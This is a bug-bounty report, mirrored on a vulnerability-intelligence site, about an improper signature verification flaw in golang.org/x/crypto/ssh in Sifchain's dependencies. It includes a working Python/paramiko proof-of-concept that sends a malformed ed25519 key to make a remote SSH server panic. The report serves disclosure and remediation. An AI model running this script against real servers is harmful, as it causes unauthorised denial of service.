Loading HuntDB...
Hunt
Vulnerability Intelligence by wss.sh
Home Daily Briefings High Impact CVEs Recent Exploits KEV Catalog GitHub Advisories Latest Updates Security News
Sign In Sign Up

Signature Verification /// golang.org/x/crypto/ssh

High
S
Sifchain
Submitted None
Actions:
View on HackerOne
Reported by dpredrag

Vulnerability Details

Technical details and impact analysis

Cryptographic Issues - Generic
## Summary: Crypto package are vulnerable to Improper Signature Verification " An attacker can craft an ssh-ed25519 or [email protected] public key, such that the library will panic when trying to verify a signature with it. Clients can deliver such a public key and signature to any golang.org/x/crypto/ssh server with a PublicKeyCallback, and servers can deliver them to any golang.org/x/crypto/ssh client " Introduced through: github.com/Sifchain/[email protected] › golang.org/x/[email protected] Introduced through: github.com/Sifchain/[email protected] › github.com/tyler-smith/[email protected] › golang.org/x/[email protected] and few more I can provide more points if needed {F1386859} ## Steps To Reproduce: 1 . python poc.py localhost 2022 root (or x.x.x.x depends on setup) poc.py ``` # This should cause a panic on the remote server. # #!/usr/bin/env python import socket import sys import paramiko from paramiko.common import cMSG_SERVICE_REQUEST, cMSG_USERAUTH_REQUEST if len(sys.argv) != 4: print('./poc.py <host> <port> <user>') sys.exit(1) host = sys.argv[1] port = int(sys.argv[2]) user = sys.argv[3] sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((host, port)) t = paramiko.Transport(sock) t.start_client() t.lock.acquire() m = paramiko.Message() m.add_byte(cMSG_SERVICE_REQUEST) m.add_string("ssh-userauth") t._send_message(m) m = paramiko.Message() m.add_byte(cMSG_USERAUTH_REQUEST) m.add_string(user) m.add_string("ssh-connection") m.add_string('publickey') m.add_boolean(True) m.add_string('ssh-ed25519') # Send an SSH key that is too short (ed25519 keys are 32 bytes) m.add_string(b'\x00\x00\x00\x0bssh-ed25519\x00\x00\x00\x15key-that-is-too-short') # Send an empty signature (the server won't get far enough to validate it) m.add_string(b'\x00\x00\x00\x0bssh-ed25519\x00\x00\x00\x00') t._send_message(m) print('Malformed auth request sent. This should cause a panic on the remote server.') ``` This can be fixed by upgrading to golang.org/x/[email protected] ## Supporting Material/References: https://groups.google.com/g/golang-announce/c/3L45YRc91SY https://github.com/golang/crypto/commit/bac4c82f69751a6dd76e702d54b3ceb88adab236 ## Impact Summary

Report Details

Additional information and metadata

State

Closed

Substate

Not-Applicable

Submitted

Weakness

Cryptographic Issues - Generic